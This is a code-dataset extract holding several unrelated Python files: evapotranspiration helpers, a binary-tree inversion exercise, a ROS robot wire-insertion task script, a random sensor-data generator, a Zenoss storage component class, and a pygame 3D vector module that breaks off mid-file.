temp: (``float``)\n The air temperature in degrees Celcius\n Returns\n ------------------------------\n delta: (``float``)\n The slope of the saturation vapor pressure-temperature curve in kPa/C\n \"\"\"\n numerator = 2503 * math.exp((17.27 * temp) / (temp + 237.3))\n denominator = math.pow(temp + 237.3, 2)\n delta = numerator / denominator\n return delta\n\n\ndef get_flux_density(r_n_metric, r_n, os):\n \"\"\"\n Reference page number: 44\n Currently, nighttime is defined as solar radiation values less than or equal to 5\n Parameters\n ------------------------------\n r_n_metric: (``float``)\n Solar radiation in W/m^2\n r_n: (``float``)\n Solar radiation in MJ/hm2\n os: (``bool``)\n Boolean which indicates whether to calculate G for short reference or tall reference\n Returns\n ------------------------------\n G: (``float``)\n Soil heat flux density MJ/m^2 h\n \"\"\"\n G = None\n daytime = r_n_metric > 5\n\n if os:\n if daytime:\n G = 0.1 * r_n\n else:\n G = 0.5 * r_n\n else:\n if daytime:\n G = 0.04 * r_n\n else:\n G = 0.2 * r_n\n return G\n\n\ndef get_gamma(p):\n \"\"\"\n Reference page number: 28\n Parameters\n ------------------------------\n p: (``float``)\n Barometric pressure in kPa\n Returns\n ------------------------------\n gamma: (``float``)\n Gamma (psychrometric constant) in kPa/C\n \"\"\"\n gamma = 0.000665 * p\n return gamma\n\n\ndef get_cn(r_n_metric, os):\n \"\"\"\n Reference page number: 5\n Parameters\n ------------------------------\n r_n_metric: (``float``)\n Solar radiation in W/m^2\n os: (``bool``)\n Boolean which indicates whether to calculate G for short reference or tall reference\n Returns\n ------------------------------\n cn: (``int``)\n Numerator constant\n \"\"\"\n cn = None\n daytime = r_n_metric > 5\n if os:\n if daytime > 5:\n cn = 37\n return cn\n else:\n cn = 37\n return cn\n else:\n if daytime > 5:\n cn = 66\n return cn\n else:\n cn = 66\n return cn\n\n\ndef get_cd(r_n_metric, os):\n \"\"\"\n Reference page number: 5\n Parameters\n ------------------------------\n r_n_metric: (``float``)\n Solar radiation in W/m^2\n os: (``bool``)\n Boolean which indicates whether to calculate G for short reference or tall reference\n Returns\n ------------------------------\n cd: (``float``)\n Denominator constant\n \"\"\"\n cd = None\n daytime = r_n_metric > 5\n\n if os:\n if daytime > 5:\n cd = 0.24\n return cd\n else:\n cd = 0.96\n return cd\n else:\n if daytime > 5:\n cd = 0.25\n return cd\n else:\n cd = 1.7\n return cd\n\n\ndef get_es(temp):\n \"\"\"\n Reference page number: 29\n Parameters\n ------------------------------\n temp: (``float``)\n Air temperature in degrees Celcius\n Returns\n ------------------------------\n es: (``float``)\n The saturation vapour pressure\n \"\"\"\n es = 0.6108 * math.exp((17.27 * temp) / (temp + 237.3))\n return es\n\n\ndef get_ea(temp, rh):\n \"\"\"\n Reference page number: 31-32\n Parameters\n ------------------------------\n temp: (``float``)\n Air temperature in degrees Celcius\n rh: (``float``)\n Relative humidity\n Returns\n ------------------------------\n ea: (``float``)\n The actual vapour pressure\n \"\"\"\n es = get_es(temp)\n ea = (rh / 100) * es\n return ea\n\n\ndef solar_rad_metric_to_campbell(rad):\n \"\"\"\n Parameters\n ------------------------------\n rad: (``float``)\n Solar radiation in W/m2\n Returns\n ------------------------------\n campbell_rad: (``float``)\n Solar radiation in MJ/hm2\n \"\"\"\n campbell_rad = rad * (3600 / math.pow(10, 6))\n return campbell_rad\n\n\ndef solar_rad_campbell_to_metric(rad):\n \"\"\"\n Parameters\n ------------------------------\n rad: (``float``)\n Solar radiation in MJ/hm2\n Returns\n ------------------------------\n metric_rad: (``float``)\n Solar radiation in W/m2\n \"\"\"\n metric_rad = rad * (math.pow(10, 6) / 3600)\n return metric_rad\n","repo_name":"RTGS-Lab/pygemsiot","sub_path":"models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"37755819709","text":"'''\n剑指 Offer 第27题 二叉树的镜像\nleetcode 226. Invert Binary Tree\n'''\n\ndef invert_tree(root):\n '''\n 将二叉树转换为它的镜像二叉树\n '''\n # 解法一:递归\n # if not root:\n # return None\n # root.left, root.right = invert_tree(root.right), invert_tree(root.left)\n # return root\n\n # 解法二:非递归\n # if not root:\n # return None\n # stack = [root]\n # while stack:\n # cur = stack.pop()\n # if cur:\n # cur.left, cur.right = cur.right, cur.left\n # if cur.left:\n # stack.append(cur.left)\n # if cur.right:\n # stack.append(cur.right)\n # return root\n\n # 解法二精简代码:\n stack = [root]\n while stack:\n cur = stack.pop()\n if cur:\n cur.left, cur.right = cur.right, cur.left\n stack.append(cur.left)\n stack.append(cur.right)\n return root","repo_name":"wuyaqiang/Algorithm_Learn","sub_path":"剑指Offer/MyCode/No_27.py","file_name":"No_27.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20689310982","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nimport rospy\nimport time\nfrom PyKDL import Frame, Vector, Rotation\nimport PyKDL\nimport tf\nfrom superros.comm import RosNode\nfrom superros.logger import Logger\nfrom rocup.param.global_parameters import Parameters\nfrom rocup.taskmanager.task_manager_state_machine import TaskManagerSM\nimport superros.transformations as transformations\nimport json\n\n\ndef getControlInputs(node, ctrl_id):\n if ctrl_id == \"wire_insertion\":\n hole_tf = None\n while not hole_tf:\n try:\n hole_tf = node.retrieveTransform(frame_id=\"tf_storage_hole\",\n parent_frame_id=\"comau_smart_six/base_link\",\n time=-1)\n hole_tf = transformations.KDLtoTf(hole_tf)\n except Exception as e:\n print(\"Waiting for 'tf_storage_hole'...\")\n\n print(\"'tf_storage_hole' FOUND!!!\")\n return {\"hole_tf\": hole_tf, \"wire_angle\": 0}\n else:\n return None\n\n\nif __name__ == '__main__':\n\n #⬢⬢⬢⬢⬢➤ NODE\n node = RosNode(\"wires_task\")\n node.setupParameter(\"hz\", 50)\n node.setHz(node.getParameter(\"hz\"))\n\n task_name = \"wires_task_comau\"\n\n# ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇ Parameters ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇\n\n #⬢⬢⬢⬢⬢➤ Robots\n comau_name = Parameters.get(\"COMAU_NAME\")\n gripper_name = Parameters.get(\"SCHUNK_NAME\")\n robot_list = [comau_name, gripper_name]\n\n #⬢⬢⬢⬢⬢➤ Sensors\n tactile_name = \"tactile\"\n sensor_list = [tactile_name]\n\n #⬢⬢⬢⬢⬢➤ Subtasks\n insertion_task_name = \"insertion_task\"\n tool_correction_task_name = \"tool_correction_task\"\n wire_tf_filter_task_name = \"tf_filter\"\n subtask_list = [insertion_task_name, tool_correction_task_name, wire_tf_filter_task_name]\n\n #⬢⬢⬢⬢⬢➤ Controllers\n insertion_control_params = {\n \"step_size\": 0.0001,\n \"force_p_gain\": 1000.0,\n \"force_threshold\": 0.3,\n \"threshold\": [0.15, 2, 2]\n }\n\n insertion_control_inputs = getControlInputs(node, \"wire_insertion\")\n\n# ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇\n# ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇ INSTRUCTION LIST ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇\n# ▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇▇\n\n instruction_list = [\n\n # --------------------------------\n # ----- initial configuration ----\n # --------------------------------\n\n comau_name + \" gototf tf_storage_normal gripper\",\n gripper_name + \" gotoshape shape_open_max\",\n tactile_name + \" reset\",\n\n # # --------------------------------\n # # ---------- wire grasp ----------\n # # --------------------------------\n\n # # fixed and known (wire position)\n # comau_name + \" gototf tf_grasp_approach_1 gripper\",\n # comau_name + \" gototf tf_storage_grasp gripper\",\n # gripper_name + \" gotoshape shape_close\",\n # comau_name + \" gototf tf_grasp_approach_1 gripper\",\n\n # detected by vision (wire position)\n comau_name + \" gototf tf_storage_wire_detection camera\",\n \"system sleep 10\",\n wire_tf_filter_task_name + \" clear tf_name:::terminal_tf\",\n wire_tf_filter_task_name + \" start tf_name:::terminal_tf\",\n comau_name + \" gototf tf_wire_2 gripper\",\n comau_name + \" gototf tf_wire_1 gripper\",\n gripper_name + \" gotoshape shape_close\",\n\n # --------------------------------\n # ------- tool correction --------\n # --------------------------------\n\n comau_name + \" gototf tf_storage_camera_front gripper\",\n \"system sleep 15\",\n tool_correction_task_name + \" correct tool_name:::gripper\",\n comau_name + \" gototf tf_storage_camera_front dynamic\",\n\n comau_name + \" gototf tf_hole_approach_1 dynamic\",\n\n # --------------------------------\n # ----------- insertion ----------\n # --------------------------------\n tactile_name + \" reset\",\n comau_name + \" direct active:::\" + json.dumps(True),\n comau_name + \" controllerdisable id:::\" + json.dumps([\"_all_\"]),\n comau_name + \" controllerselect id:::\" + json.dumps([\"wire_insertion\"]),\n comau_name + \" controllerparameters parameters:::\" + json.dumps({\"wire_insertion\": insertion_control_params}),\n \"system sleep 0.1\",\n comau_name + \" controllerstart input_data:::\" + json.dumps({\"wire_insertion\": insertion_control_inputs}),\n \"system sleep 0.1\",\n insertion_task_name + \" waitend condition:::fuzzy_insertion\",\n \"system condition jumpfalse:::___insertion_fail___\",\n comau_name + \" direct active:::\" + json.dumps(False),\n \"system sleep 15\", # <---- avvitatore\n gripper_name + \" gotoshape shape_open\",\n\n \"___insertion_fail___\",\n comau_name + \" gototf tf_hole_approach_1 dynamic\"\n\n ]\n\n ###############################################################################################\n ###############################################################################################\n ###############################################################################################\n\n tskm = TaskManagerSM(task_name)\n\n tskm.start(robot_list, sensor_list, instruction_list, subtask_list)\n try:\n while node.isActive():\n tskm.stepForward()\n node.tick()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"zanellar/rocup","sub_path":"scripts/nodes/examples/task_manager/example_task_complete_TODO.py","file_name":"example_task_complete_TODO.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40051422670","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 23 15:26:18 2018\r\n\r\n@author: roza.gruter\r\n\"\"\"\r\n\r\nimport random as rd\r\nimport csv\r\nimport time\r\n\r\n\r\ndef get_nb_sensors():\r\n \"\"\"\r\n Ask user how many sensors need to be generated\r\n Output:\r\n nb_sensors -> number of sensors requested by the user\r\n \"\"\"\r\n\r\n print(\"****************************************************************\")\r\n print(\" Enter the number of sensors to be generated.\")\r\n print(\" You can choose between 1 and 6 sensors.\")\r\n nb_sensors = input(\"Nb of sensors: \")\r\n print(\"\")\r\n print(\"****************************************************************\")\r\n\r\n try:\r\n if (int(nb_sensors) > 6) or (int(nb_sensors) <= 0):\r\n raise ValueError\r\n else:\r\n return int(nb_sensors)\r\n except ValueError:\r\n print(\"Incorrect input. Please try again.\")\r\n return get_nb_sensors()\r\n\r\n\r\ndef get_refresh_rate():\r\n \"\"\"\r\n What should be the refresh rate (in seconds)\r\n Output:\r\n --> integer, nb of seconds between refresh\r\n \"\"\"\r\n\r\n refresh_rate = input(\"Enter the refresh rate (in seconds): \")\r\n print(\"\")\r\n print(\"****************************************************************\")\r\n\r\n try:\r\n return int(refresh_rate)\r\n except ValueError:\r\n print(\"Incorrect input. Please try again.\")\r\n return get_refresh_rate()\r\n\r\n\r\ndef get_data_types(nb_sensors):\r\n \"\"\"\r\n What should be the data type for each sensor (1 - integer, 2 - float)\r\n Input\r\n nb_sensors -> how many sensors (int)\r\n Output\r\n data_type_per_sensor -> list of data types for each sensor\r\n \"\"\"\r\n\r\n print(\"Choose data type for each sensor: 1-integer / 2-float\")\r\n print(\"Enter 1 or 2 for each sensor, use space as a separator\")\r\n nb_type = input(\"Data Types: \")\r\n print(\"\")\r\n print(\"****************************************************************\")\r\n\r\n # split string\r\n data_types = nb_type.split(\" \")\r\n allowed_data_types = (1, 2)\r\n data_nbr = len(data_types)\r\n\r\n if (nb_sensors == data_nbr):\r\n try:\r\n for idx in range(data_nbr):\r\n if int(data_types[idx]) in allowed_data_types:\r\n continue\r\n else:\r\n raise ValueError\r\n\r\n # put splitted data into a list\r\n data_type_per_sensor = [int(data_types[i]) for i in range(data_nbr)]\r\n return data_type_per_sensor\r\n except ValueError:\r\n print(\"Invalid input. Please try again.\")\r\n return get_data_types(nb_sensors)\r\n else:\r\n print(\"Invalid input. Please try again.\")\r\n return get_data_types(nb_sensors)\r\n\r\n\r\ndef get_sensors_minmax(nb_sensors, data_types):\r\n \"\"\"\r\n What are min & max values from which random numbers should be generated (for each sensor)\r\n Input:\r\n nb_sensors -> for how many sensors the details needs to be fetched\r\n data_types -> a list of data types (integers)\r\n Output:\r\n details_sensors -> a nested dictionary with info for each sensor\r\n \"\"\"\r\n\r\n # create a nested dict with info for each sensor:\r\n # data type, min value, max value\r\n details_sensors = {\"Sensor {}\".format(idx + 1): {} for idx in range(nb_sensors)}\r\n sensors_minmax = [] # list of tuples\r\n\r\n for idx in range(nb_sensors):\r\n print(\"Give min and max range of numbers for sensor {}:\".format(idx + 1))\r\n sensor = get_sensor_minmax() # tuple with min & max values for a given sensor\r\n sensors_minmax.append(sensor)\r\n\r\n # complete the nested dictionary with corresponding values for each sensor\r\n for idx in range(nb_sensors):\r\n details_sensors['Sensor {}'.format(idx + 1)] = {'data_type': data_types[idx], 'min': sensors_minmax[idx][0],\r\n 'max': sensors_minmax[idx][1]}\r\n\r\n return details_sensors\r\n\r\n\r\ndef get_sensor_minmax():\r\n \"\"\"\r\n A function to get one set of input (min & max) from the console\r\n Output\r\n sensor_minmax -> tuple of integers for min value and max value\r\n \"\"\"\r\n\r\n sensor = input()\r\n print(\"\")\r\n print(\"****************************************************************\")\r\n sensor_splitted = sensor.split(\" \")\r\n try:\r\n sensor_splitted_int = [int(sensor_splitted[i]) for i in range(len(sensor_splitted))]\r\n if sensor_splitted_int[0] < sensor_splitted_int[1]:\r\n sensor_minmax = tuple(sensor_splitted_int)\r\n return sensor_minmax\r\n else:\r\n raise ValueError\r\n except ValueError:\r\n print(\"Incorrect Input. Please try again.\")\r\n return get_sensor_minmax()\r\n\r\n\r\ndef sensor_data(data_type, min_val, max_val):\r\n \"\"\"\r\n A function to generate the random number\r\n Input\r\n data_type -> int, type of output for the given sensor\r\n min_val -> minimum allowed value for this sensor\r\n max_val -> maximum allowed value for this sensor\r\n Output:\r\n number -> sensor output for the given iteration\r\n \"\"\"\r\n\r\n if data_type == 1:\r\n number = rd.randint(min_val, max_val)\r\n return number\r\n elif data_type == 2:\r\n number = float(\"{0:.2f}\".format(rd.uniform(min_val, max_val)))\r\n return number\r\n\r\n\r\ndef write_into_csv(random_numbers):\r\n \"\"\"\r\n A function to write each set of random data into one line in a csv file.\r\n The file will be created if doesn't exist, or new data will be added if already exist.\r\n Input\r\n random_numbers -> a set of output of all the sensors\r\n Output:\r\n data is written into a csv file\r\n \"\"\"\r\n\r\n with open(r'sensor_data.txt', 'a', encoding='utf8') as csvfile:\r\n sensor_writer = csv.writer(csvfile, delimiter='|', quotechar='\"', quoting=csv.QUOTE_NONE)\r\n sensor_writer.writerow(random_numbers)\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n Main function to run the generator\r\n Manages obtaining input values from the user, generating data in a given time interval and writing it into a file\r\n \"\"\"\r\n nb_sensors = get_nb_sensors()\r\n ref_rate = get_refresh_rate()\r\n data_types = get_data_types(nb_sensors)\r\n sensors_min_max = get_sensors_minmax(nb_sensors, data_types)\r\n\r\n while True:\r\n sensor_numbers = []\r\n for idx in range(nb_sensors):\r\n tmp = sensors_min_max[f'Sensor {idx+1}'] # details of a given sensor (data type, min & max values)\r\n data = sensor_data(tmp['data_type'], tmp['min'], tmp['max'])\r\n sensor_numbers.append(data)\r\n write_into_csv(sensor_numbers)\r\n print(sensor_numbers)\r\n time.sleep(ref_rate)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"RozaGruter/Random_Numbers_Generator","sub_path":"Random_Numbers_Generator_Console.py","file_name":"Random_Numbers_Generator_Console.py","file_ext":"py","file_size_in_byte":6728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38576339738","text":"__doc__=\"\"\"HPEVAConsistencySet\n\nHPEVAConsistencySet is an abstraction of a HPEVA_ConsistencySet\n\n$Id: HPEVAConsistencySet.py,v 1.2 2010/12/06 09:55:38 egor Exp $\"\"\"\n\n__version__ = \"$Revision: 1.2 $\"[11:-2]\n\nfrom Globals import DTMLFile, InitializeClass\nfrom AccessControl import ClassSecurityInfo\nfrom Products.ZenModel.OSComponent import *\nfrom Products.ZenRelations.RelSchema import *\nfrom Products.ZenModel.ZenossSecurity import *\nfrom HPEVAComponent import *\n\nfrom Products.ZenUtils.Utils import convToUnits\nfrom Products.ZenUtils.Utils import prepId\n\nimport logging\nlog = logging.getLogger(\"zen.HPEVAConsistencySet\")\n\n\ndef manage_addConsistencySet(context, id, userCreated, REQUEST=None):\n \"\"\"make ConsistencySet\"\"\"\n svid = prepId(id)\n sv = HPEVAConsistencySet(svid)\n context._setObject(svid, sv)\n sv = context._getOb(svid)\n if userCreated: sv.setUserCreatedFlag()\n if REQUEST is not None:\n REQUEST['RESPONSE'].redirect(context.absolute_url()+'/manage_main')\n return sv\n\nclass HPEVAConsistencySet(OSComponent, HPEVAComponent):\n \"\"\"HPConsistencySet object\"\"\"\n\n portal_type = meta_type = 'HPEVAConsistencySet'\n\n caption = \"\"\n failSafe = \"\"\n hostAccessMode = \"\"\n participationType = \"\"\n remoteCellName = \"\"\n suspendMode = \"\"\n writeMode = \"\"\n state = \"OK\"\n\n _properties = OSComponent._properties + (\n {'id':'caption', 'type':'string', 'mode':'w'},\n {'id':'failSafe', 'type':'string', 'mode':'w'},\n {'id':'hostAccessMode', 'type':'string', 'mode':'w'},\n {'id':'participationType', 'type':'string', 'mode':'w'},\n {'id':'remoteCellName', 'type':'string', 'mode':'w'},\n {'id':'suspendMode', 'type':'string', 'mode':'w'},\n {'id':'writeMode', 'type':'string', 'mode':'w'},\n {'id':'state', 'type':'string', 'mode':'w'},\n )\n\n _relations = OSComponent._relations + (\n (\"os\", ToOne(ToManyCont,\n \"ZenPacks.community.HPEVAMon.HPEVADevice.HPEVADeviceOS\",\n \"drgroups\")),\n (\"storagepool\", ToOne(ToMany,\n \"ZenPacks.community.HPEVAMon.HPEVAStoragePool\",\n \"drgroups\")),\n (\"virtualdisks\", ToMany(\n ToOne,\n \"ZenPacks.community.HPEVAMon.HPEVAStorageVolume\",\n \"drgroup\")),\n )\n\n factory_type_information = (\n {\n 'id' : 'ConsistencySet',\n 'meta_type' : 'ConsistencySet',\n 'description' : \"\"\"Arbitrary device grouping class\"\"\",\n 'icon' : 'ConsistencySet_icon.gif',\n 'product' : 'ZenModel',\n 'factory' : 'manage_addConsistencySet',\n 'immediate_view' : 'viewHPEVAConsistencySet',\n 'actions' :\n (\n { 'id' : 'status'\n , 'name' : 'Status'\n , 'action' : 'viewHPEVAConsistencySet'\n , 'permissions' : (ZEN_VIEW,)\n },\n { 'id' : 'members'\n , 'name' : 'Members'\n , 'action' : 'viewHPEVAConsistencySetMembers'\n , 'permissions' : (ZEN_VIEW, )\n },\n { 'id' : 'events'\n , 'name' : 'Events'\n , 'action' : 'viewEvents'\n , 'permissions' : (ZEN_VIEW, )\n },\n { 'id' : 'perfConf'\n , 'name' : 'Template'\n , 'action' : 'objTemplates'\n , 'permissions' : (ZEN_CHANGE_DEVICE, )\n },\n { 'id' : 'viewHistory'\n , 'name' : 'Modifications'\n , 'action' : 'viewHistory'\n , 'permissions' : (ZEN_VIEW_MODIFICATIONS,)\n },\n )\n },\n )\n\n\n security = ClassSecurityInfo()\n\n\n security.declareProtected(ZEN_CHANGE_DEVICE, 'setStoragePool')\n def setStoragePool(self, spid):\n \"\"\"\n Set the storagepool relationship to the storage pool specified by the given\n id.\n \"\"\"\n strpool = getattr(self.os().storagepools, str(spid), None)\n if strpool: self.storagepool.addRelation(strpool)\n else: log.warn(\"storage pool id:%s not found\", spid)\n\n\n security.declareProtected(ZEN_VIEW, 'getStoragePool')\n def getStoragePool(self):\n return self.storagepool()\n\n\n security.declareProtected(ZEN_VIEW, 'getStoragePoolName')\n def getStoragePoolName(self):\n return getattr(self.getStoragePool(), 'caption', 'Unknown')\n\n\n def getCurrentPercentLogLevel(self):\n return \"%s%%\"%self.cacheRRDValue('CurrentPercentLogLevel', 0)\n\n\n def getLogDiskReservedCapacity(self):\n return convToUnits(self.cacheRRDValue('LogDiskReservedCapacity', 0)*512)\n\n\n def getRRDNames(self):\n \"\"\"\n Return the datapoint name of this ConsistencySet\n \"\"\"\n return ['ConsistencySet_CurrentPercentLogLevel',\n 'ConsistencySet_LogDiskReservedCapacity',\n ]\n\nInitializeClass(HPEVAConsistencySet)\n","repo_name":"zenoss/Community-Zenpacks","sub_path":"ZenPacks.community.HPEVAMon/ZenPacks/community/HPEVAMon/HPEVAConsistencySet.py","file_name":"HPEVAConsistencySet.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"42735267945","text":"import math\r\nimport pygame\r\nimport pygame.gfxdraw\r\nimport os\r\nimport sys\r\nfrom pygame.locals import *\r\nfrom .generals import *\r\n\r\n\r\n#Transform float positions into simple integers to avoid Errors\r\ndef simplifypos(p): return (int(p[0]),int(p[1]))\r\n\r\ndef root(p):\r\n if p > 0: return math.sqrt(p)\r\n elif p < 0: return math.sqrt(-p)\r\n else: return 0.1\r\n \r\n#2d vectors are used for 3d representation, 3d vectors have a function witch turn them into representable 2d coordinates \r\nclass vec2d(object):\r\n \r\n def __init__(self,pos):\r\n self.pos = pos \r\n \r\n def pointatX(self,x):\r\n a = x/self.pos[0]\r\n b = self.pos[1]*a\r\n return (x,b)\r\n \r\n def pointatY(self,y):\r\n b = y/self.pos[1]\r\n a = self.pos[0]*b\r\n return (a,y)\r\n\r\n\r\n#simple vector operations \r\ndef addvec(v1,v2):\r\n ret = list(v1.pos)\r\n for i in range(len(ret)): ret[i] += v2.pos[i]\r\n v = vec2d(tuple(ret))\r\n return v\r\n\r\ndef addvec3d(v1,v2):\r\n ret = list(v1.pos)\r\n su = list(v2.pos)\r\n for i in range(len(ret)): ret[i] += su[i]\r\n v = vec3d(tuple(ret))\r\n return v\r\n\r\ndef subvec(v1,v2):\r\n ret = list(v1.pos)\r\n for i in range(len(ret)): ret[i] -= v2.pos[i]\r\n v = vec2d(tuple(ret))\r\n return v \r\n\r\ndef subvec3d(v1,v2):\r\n ret = list(v1.pos)\r\n for i in range(len(ret)): ret[i] -= v2.pos[i]\r\n v = vec3d(tuple(ret))\r\n return v \r\n\r\ndef mulvec(v1,n):\r\n ret = list(v1.pos)\r\n for i in range(len(ret)): ret[i] *= n\r\n v = vec2d(tuple(ret))\r\n return v \r\n\r\ndef mulvec(v1,n):\r\n ret = list(v1.pos)\r\n for i in range(len(ret)): ret[i] *= n\r\n v = vec3d(tuple(ret))\r\n return v \r\n\r\ndef divvec(v1,num):\r\n n = num\r\n if n == 0: n = -0.1\r\n ret = list(v1.pos)\r\n for i in range(len(ret)): ret[i] = int(ret[i]/n)\r\n v = vec2d(tuple(ret))\r\n return v \r\n\r\ndef divvec3d(v1,num):\r\n n = num\r\n if n == 0: n = -0.1\r\n ret = list(v1.pos)\r\n for i in range(len(ret)): ret[i] = int(ret[i]/n)\r\n v = vec3d(tuple(ret))\r\n return v \r\n \r\ndef absvec3d(v):\r\n ret = []\r\n for p in v.pos: ret.append(abs(p))\r\n return vec3d(tuple(ret))\r\n\r\n#Using shapely to get if a 2d polygon is totally inside another one\r\n\r\ndef totally_inside(p1,p2):\r\n ret = True\r\n for p in p2:\r\n if not Polygon(p1).contains(Point(p)):\r\n ret = False\r\n break\r\n return ret\r\n\r\n#Shitty texture loading\r\n\r\ndef texture(path): return pygame.image.load(os.path.join(os.getcwd(),'res','img',path))\r\n \r\n#3d vectors to computate dimensions easily \r\nclass vec3d(object):\r\n def __init__(self,pos):\r\n self.pos = pos\r\n \r\n def get2d(self):\r\n v = vec2d((self.pos[0],self.pos[1]))\r\n if self.pos[2] >= 0: v = divvec(mulvec(v,40),root(self.pos[2]))\r\n else: v = addvec(divvec(mulvec(v,40),root(0)),divvec(mulvec(v,20),root(0))) \r\n return v\r\n\r\n p = list(pos)\r\n \r\n x,y,z = 0,0,0\r\n\r\n def rotate(self,val,p,axis):\r\n \r\n x = self.pos[0]\r\n y = self.pos[1]\r\n z = self.pos[2]\r\n \r\n if axis == 0: \r\n x = p[0] + math.cos(val)*(self.pos[0] - p[0]) - math.sin(val)*(self.pos[2] - p[2]) \r\n z = p[2] + math.sin(val)*(self.pos[0] - p[0]) + math.cos(val)*(self.pos[2] - p[2])\r\n \r\n elif axis == 1:\r\n x = p[0] + math.cos(val)*(self.pos[0] - p[0]) - math.sin(val)*(self.pos[1] - p[1]) \r\n y = p[1] + math.sin(val)*(self.pos[0] - p[0]) + math.cos(val)*(self.pos[1] - p[1])\r\n \r\n elif axis == 2: \r\n y = p[1] + math.sin(val)*(self.pos[2] - p[2]) + math.cos(val)*(self.pos[1] - p[1])\r\n z = p[2] + math.cos(val)*(self.pos[2] - p[2]) - math.sin(val)*(self.pos[1] - p[1])\r\n \r\n self.pos = (x,y,z)\r\n\r\n \r\n def getDistance(self,p): \r\n ret = 0\r\n vec = subvec3d(self,vec3d(p))\r\n for v in vec.pos: ret += pow(v,2)\r\n ret = math.sqrt(ret)\r\n return ret\r\n \r\n def getAngles(self,p):\r\n \r\n vec = subvec3d(self,vec3d(p))\r\n \r\n angle_xz = math.atan2(vec.pos[0],vec.pos[2])\r\n angle_xy = math.atan2(vec.pos[0],vec.pos[1])\r\n \r\n return angle_xz, angle_xy\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n #objects based on 3d vectors\r\n \r\nclass triangle(object): \r\n def __init__(self,w,poss,col): \r\n self.points = [poss[0],poss[1],poss[2]]\r\n po = []\r\n for p in self.points:\r\n po.append(w.vcount)\r\n w.addvec(vec3d(p))\r\n w.addpol(po) \r\n self.pol_ID = w.pcount-1\r\n self.world = w\r\n self.col = col\r\n w.col.append(col)\r\n self.center = vec3d(((poss[0][0] + poss[1][0] + poss[2][0])/3,(poss[0][1] + poss[1][1] + poss[2][1])/3,(poss[0][2] + poss[1][2] + poss[2][2])/3))\r\n \r\n def move(self,pos): \r\n self.world.movepol(self.pol_ID,pos)\r\n self.center = addvec3d(self.center,vec3d(pos))\r\n \r\n def rotate(self,val,pos,axis): \r\n self.world.polrotate(self.pol_ID,val,pos,axis)\r\n self.center.rotate(val,pos,axis)\r\n\r\n \r\nclass rect(object):\r\n def __init__(self,w,p,dim,col):\r\n self.triangles = []\r\n self.world = w\r\n pos = vec3d(p)\r\n self.col = col\r\n \r\n tr = [\r\n [\r\n pos,\r\n addvec3d(pos,vec3d((dim[0],0,0))),\r\n addvec3d(pos,vec3d((0,dim[1],0))),\r\n addvec3d(pos,vec3d((dim[0],dim[1],0)))\r\n ],\r\n [\r\n pos,\r\n addvec3d(pos,vec3d((0,0,dim[2]))),\r\n addvec3d(pos,vec3d((0,dim[1],0))),\r\n addvec3d(pos,vec3d((0,dim[1],dim[2])))\r\n ],\r\n [\r\n addvec3d(pos,vec3d((0,0,dim[2]))),\r\n addvec3d(pos,vec3d((dim[0],0,dim[2]))),\r\n addvec3d(pos,vec3d((0,dim[1],dim[2]))),\r\n addvec3d(pos,vec3d((dim[0],dim[1],dim[2])))\r\n ],\r\n [\r\n addvec3d(pos,vec3d((dim[0],0,0))),\r\n addvec3d(pos,vec3d((dim[0],0,dim[2]))),\r\n addvec3d(pos,vec3d((dim[0],dim[1],0))),\r\n addvec3d(pos,vec3d((dim[0],dim[1],dim[2])))\r\n ],\r\n [\r\n pos,\r\n addvec3d(pos,vec3d((0,0,dim[2]))),\r\n addvec3d(pos,vec3d((dim[0],0,0))), \r\n addvec3d(pos,vec3d((dim[0],0,dim[2]))) \r\n ],\r\n [\r\n addvec3d(pos,vec3d((0,dim[1],0))),\r\n addvec3d(pos,vec3d((0,dim[1],dim[2]))),\r\n addvec3d(pos,vec3d((dim[0],dim[1],0))),\r\n addvec3d(pos,vec3d((dim[0],dim[1],dim[2]))) \r\n ]\r\n ]\r\n \r\n for q in tr:\r\n self.triangles.append(triangle(self.world,(q[0].pos,q[1].pos,q[2].pos),col))\r\n self.triangles.append(triangle(self.world,(q[3].pos,q[1].pos,q[2].pos),col))\r\n \r\n self.center = vec3d((p[0]+dim[0]/2,p[1]+dim[1]/2,p[2]+dim[2]/2))\r\n \r\n def move(self,pos):\r\n for t in self.triangles: t.move(pos)\r\n self.center = addvec3d(self.center,vec3d(pos))\r\n \r\n def rotate(self,val,pos,axis):\r\n for t in self.triangles: t.rotate(val,pos,axis)\r\n \r\n \r\nclass body(object):\r\n def __init__(self,w,p,points,col):\r\n \r\n self.triangles = []\r\n self.world = w\r\n self.col = col\r\n \r\n self.origin = vec3d(p)\r\n \r\n i = 0\r\n \r\n while (i+2) < len(points):\r\n self.triangles.append(triangle(self.world,(points[i],points[i+1],points[i+2]),self.col))\r\n i += 1\r\n \r\n 